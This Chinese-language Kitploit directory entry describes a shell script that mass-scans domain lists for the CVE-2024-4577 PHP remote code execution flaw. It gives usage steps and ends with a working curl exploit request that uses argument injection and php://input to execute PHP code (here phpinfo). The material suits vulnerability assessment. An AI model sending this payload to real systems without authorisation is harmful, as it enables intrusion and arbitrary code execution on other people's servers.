Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-4577 — 用于扫描域名是否存在CVE-2024-4577 PHP远程代码执行漏洞的Shell脚本,通过构造POST请求,导出易受攻击的目标以便手动验证。 | Kitploit
工具/GitHubGitHub/graphite-org/cve-2024-4577
侦察漏洞扫描器漏洞利用Web应用程序漏洞利用渗透测试
GitHubgraphite-org/cve-2024-4577

CVE-2024-4577

用于扫描域名是否存在CVE-2024-4577 PHP远程代码执行漏洞的Shell脚本,通过构造POST请求,导出易受攻击的目标以便手动验证。

查看仓库
2年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-4577 漏洞检查器

该脚本用于检查 CVE-2024-4577 所描述的漏洞,该漏洞涉及利用某些 PHP 配置在远程执行任意代码。它会向指定域列表中的端点发送 POST 请求,并检查响应是否表明存在漏洞。

使用说明

  1. 安装 GNU Parallel:

    root@kitploit:~
    sudo apt-get install parallel
    
  2. 克隆仓库: 使用 Git 将此仓库克隆到本地计算机:

    root@kitploit:~
    git clone https://github.com/Yukiioz/CVE-2024-4577.git
    
  3. 进入仓库目录: 切换到克隆的目录:

    root@kitploit:~
    cd CVE-2024-4577
    
  4. 准备域名列表: 创建一个包含待检查域名的文本文件。每个域名应单独一行。例如:

    root@kitploit:~
    https://example1.com
    https://example2.com
    https://example3.com
    
  5. 运行脚本: 执行脚本 CVE-2024-4577.sh,并将域名列表文件路径作为参数传入:

    root@kitploit:~
    ./CVE-2024-4577.sh live-subdomains.txt | tee script.log
    
  6. 查看输出: 脚本在检查每个域时会显示进度信息。如果发现某个域存在漏洞,会以红色高亮显示。脚本还会将漏洞域列表导出到名为 vulnerable_domains.txt 的文件中。

导出文件:vulnerable_domains.txt

脚本会将漏洞域列表导出到名为 vulnerable_domains.txt 的文件中。该文件包含简单的漏洞域列表,每个域一行。如需进一步手动确认,可使用 curl 命令向该域的目标端点发送 POST 请求。将 https://dev.example.com/test.php 替换为实际目标域中的端点。

root@kitploit:~
curl -X POST https://dev.example.com/test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input \
     -H "User-Agent: curl/8.3.0" \
     --data "<?php phpinfo(); ?>"
下载工具